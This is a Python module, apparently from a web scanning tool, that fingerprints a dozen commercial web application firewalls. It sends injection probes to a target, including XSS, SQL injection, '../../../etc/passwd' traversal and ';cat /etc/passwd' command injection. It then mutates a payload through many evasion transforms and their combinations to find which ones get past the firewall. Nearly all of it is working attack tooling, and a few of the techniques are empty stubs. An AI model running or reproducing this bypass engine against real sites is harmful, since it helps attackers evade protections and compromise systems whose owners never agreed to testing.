import re
import time
import random
import string
import hashlib
from typing import Dict, List, Optional, Tuple
from urllib.parse import quote, urlencode
from app.utils.http_client import http_request
from app.utils.logger import get_logger

logger = get_logger("waf_engine")

WAF_SIGNATURES = {
    "cloudflare": {
        "headers": ["cf-ray", "cf-cache-status", "server: cloudflare"],
        "cookies": ["__cflb", "__cfuid", "cf_clearance"],
        "block_patterns": ["cloudflare-nginx", "attention required!"],
        "status_codes": [403, 503],
    },
    "aws_waf": {
        "headers": ["x-amzn-requestid", "x-amz-cf-id", "server: amazonS3"],
        "block_patterns": ["<html><head><title>403 Forbidden</title>"],
        "status_codes": [403],
    },
    "akamai": {
        "headers": ["x-akamai-transformed", "akamai-origin-hop"],
        "block_patterns": ["access denied", "reference #"],
        "status_codes": [403],
    },
    "modsecurity": {
        "headers": ["server: apache"],
        "block_patterns": ["mod_security", "nohacker", "modsecurity", "this error was generated by mod_security"],
        "status_codes": [403, 501],
    },
    "nginx_waf": {
        "headers": ["server: nginx"],
        "block_patterns": ["nginx forbidden", "403 forbidden"],
        "status_codes": [403],
    },
    "safeDog": {
        "headers": ["waf/2.0", "safedog"],
        "block_patterns": ["safedog", "waf/2.0", "网站防火墙"],
        "status_codes": [403, 405, 500],
    },
    "yundun": {
        "headers": ["yun-cdn", "yundun"],
        "block_patterns": ["yundun", "云盾", "yun-cdn"],
        "status_codes": [403, 503],
    },
    "baidu_yunjiasu": {
        "headers": ["yunjiasu", "server: yunjiasu-nginx"],
        "block_patterns": ["yunjiasu"],
        "status_codes": [403],
    },
    "chuangyu": {
        "headers": ["cdxy-yundun", "yunsuo"],
        "block_patterns": ["yunsuo", "创宇盾"],
        "status_codes": [403, 405],
    },
    "huawei": {
        "headers": ["x-hw-", "server: elb"],
        "block_patterns": ["huawei cloud waf"],
        "status_codes": [403],
    },
    "imperiya": {
        "headers": ["server: imperiqa"],
        "block_patterns": ["imperiya", "kona"],
        "status_codes": [403],
    },
    "fortiweb": {
        "headers": ["server: fortiweb"],
        "block_patterns": ["fortiweb", "fortinet"],
        "status_codes": [403, 400],
    },
}

EVADE_TECHNIQUES = {
    "case_variation": lambda payload: ''.join(
        c.upper() if random.random() > 0.5 else c.lower() for c in payload
    ),
    "comment_injection": lambda payload: payload.replace(" ", "/**/"),
    "null_byte": lambda payload: payload.replace(" ", "%00"),
    "double_encode": lambda payload: quote(quote(payload)),
    "unicode_encode": lambda payload: payload.replace("<", "\\u003c").replace(">", "\\u003e").replace("'", "\\u0027"),
    "hex_encode": lambda payload: ''.join(
        f"\\x{ord(c):02x}" if c.isalpha() else c for c in payload
    ),
    "tab_replacement": lambda payload: payload.replace(" ", "\t"),
    "newline_injection": lambda payload: payload.replace(" ", "%0a"),
    "mixed_case_comment": lambda payload: re.sub(
        r'(\w)', lambda m: f"/**/{m.group(1)}/**/" if random.random() > 0.7 else m.group(1), payload
    ),
    "concatenation": lambda payload: payload.replace("'", "'+'" ).replace('"', '"+"'),
    "char_replacement": lambda payload: payload,
    "boundary_pollution": lambda payload: f"------WebKitFormBoundary{''.join(random.choices(string.ascii_letters, k=16))}\r\nContent-Disposition: form-data; name=\"x\"\r\n\r\n{payload}\r\n------WebKitFormBoundary{''.join(random.choices(string.ascii_letters, k=16))}--",
    "http_parameter_pollution": lambda payload: "&".join(
        f"x={payload}" for _ in range(5)
    ),
    "chunked_encoding": lambda payload: payload,
    "http_method_override": lambda payload: payload,
}


class WAFDetector:
    def __init__(self, target_url: str, timeout: int = 10):
        self.target_url = target_url.rstrip("/")
        self.timeout = timeout

    def detect(self) -> Dict:
        results = {
            "waf_detected": False,
            "waf_name": None,
            "confidence": 0,
            "details": "",
            "headers_info": {},
            "block_status_code": None,
        }

        benign_resp = self._send_request(f"{self.target_url}/")
        if benign_resp:
            results["headers_info"] = {
                k: v for k, v in benign_resp.get("headers", {}).items()
            }

        for waf_name, signatures in WAF_SIGNATURES.items():
            score = 0
            details = []

            if benign_resp:
                headers_str = str(benign_resp.get("headers", {})).lower()
                for header_sig in signatures["headers"]:
                    if header_sig.lower() in headers_str:
                        score += 30
                        details.append(f"Header match: {header_sig}")

                cookies = benign_resp.get("headers", {}).get("set-cookie", "").lower()
                for cookie_sig in signatures.get("cookies", []):
                    if cookie_sig.lower() in cookies:
                        score += 20
                        details.append(f"Cookie match: {cookie_sig}")

            test_payloads = [
                "<script>alert(1)</script>",
                "' OR '1'='1",
                "../../../etc/passwd",
                ";cat /etc/passwd",
                "${7*7}",
                "{{7*7}}",
            ]

            for payload in test_payloads:
                test_url = f"{self.target_url}/?q={quote(payload)}"
                resp = self._send_request(test_url, method="GET")
                if resp:
                    resp_body = str(resp.get("body", "")).lower()
                    resp_code = resp.get("status_code", 0)

                    if resp_code in signatures["status_codes"]:
                        score += 5

                    for pattern in signatures["block_patterns"]:
                        if pattern.lower() in resp_body:
                            score += 15
                            details.append(f"Block pattern: {pattern}")
                            break

            if score >= 30:
                confidence = min(score, 100)
                if confidence > results["confidence"]:
                    results.update({
                        "waf_detected": True,
                        "waf_name": waf_name,
                        "confidence": confidence,
                        "details": "; ".join(set(details)),
                        "block_status_code": resp_code if resp else None,
                    })

        return results

    def _send_request(self, url: str, method: str = "GET", headers: dict = None) -> Optional[Dict]:
        try:
            resp = http_request(method, url, headers=headers, timeout=self.timeout, verify=False)
            if resp:
                return {
                    "status_code": resp.get("status_code", 0),
                    "headers": resp.get("headers", {}),
                    "body": resp.get("text", ""),
                }
        except Exception as e:
            logger.debug(f"Request failed: {url} - {e}")
        return None


class WAFBypassEngine:
    def __init__(self, target_url: str, timeout: int = 10):
        self.target_url = target_url.rstrip("/")
        self.timeout = timeout
        self.waf_info = None
        self.working_techniques = []

    def analyze_and_bypass(self, payload: str) -> Dict:
        detector = WAFDetector(self.target_url, self.timeout)
        self.waf_info = detector.detect()

        results = {
            "original_payload": payload,
            "waf_detected": self.waf_info["waf_detected"],
            "waf_name": self.waf_info["waf_name"],
            "bypass_results": [],
            "working_payloads": [],
        }

        if not self.waf_info["waf_detected"]:
            results["bypass_results"].append({
                "technique": "none_needed",
                "payload": payload,
                "status": "no_waf",
            })
            return results

        for technique_name, technique_func in EVADE_TECHNIQUES.items():
            try:
                evaded_payload = technique_func(payload)
                is_bypassed = self._test_bypass(evaded_payload)
                results["bypass_results"].append({
                    "technique": technique_name,
                    "payload": evaded_payload,
                    "bypassed": is_bypassed,
                })
                if is_bypassed:
                    results["working_payloads"].append({
                        "technique": technique_name,
                        "payload": evaded_payload,
                    })
                    self.working_techniques.append(technique_name)
            except Exception as e:
                logger.debug(f"Technique {technique_name} failed: {e}")

        combo_results = self._try_combo_bypass(payload)
        results["bypass_results"].extend(combo_results)

        return results

    def _test_bypass(self, payload: str) -> bool:
        try:
            test_url = f"{self.target_url}/?q={quote(payload)}"
            resp = http_request("GET", test_url, timeout=self.timeout, verify=False)
            if resp:
                status = resp.get("status_code", 0)
                if status not in (403, 405, 406, 429, 503):
                    return True
        except Exception:
            pass
        return False

    def _try_combo_bypass(self, payload: str) -> List[Dict]:
        results = []
        combos = [
            ("case+comment", lambda p: EVADE_TECHNIQUES["comment_injection"](
                EVADE_TECHNIQUES["case_variation"](p))),
            ("case+unicode", lambda p: EVADE_TECHNIQUES["unicode_encode"](
                EVADE_TECHNIQUES["case_variation"](p))),
            ("comment+newline", lambda p: EVADE_TECHNIQUES["newline_injection"](
                EVADE_TECHNIQUES["comment_injection"](p))),
            ("double_encode+case", lambda p: EVADE_TECHNIQUES["case_variation"](
                EVADE_TECHNIQUES["double_encode"](p))),
            ("hex+case+comment", lambda p: EVADE_TECHNIQUES["comment_injection"](
                EVADE_TECHNIQUES["case_variation"](
                    EVADE_TECHNIQUES["hex_encode"](p)))),
        ]
        for combo_name, combo_func in combos:
            try:
                evaded = combo_func(payload)
                is_bypassed = self._test_bypass(evaded)
                results.append({
                    "technique": f"combo_{combo_name}",
                    "payload": evaded,
                    "bypassed": is_bypassed,
                })
                if is_bypassed:
                    self.working_techniques.append(f"combo_{combo_name}")
            except Exception as e:
                logger.debug(f"Combo {combo_name} failed: {e}")
        return results


def detect_waf(target_url: str, timeout: int = 10) -> Dict:
    detector = WAFDetector(target_url, timeout)
    return detector.detect()


def bypass_waf(target_url: str, payload: str, timeout: int = 10) -> Dict:
    engine = WAFBypassEngine(target_url, timeout)
    return engine.analyze_and_bypass(payload)
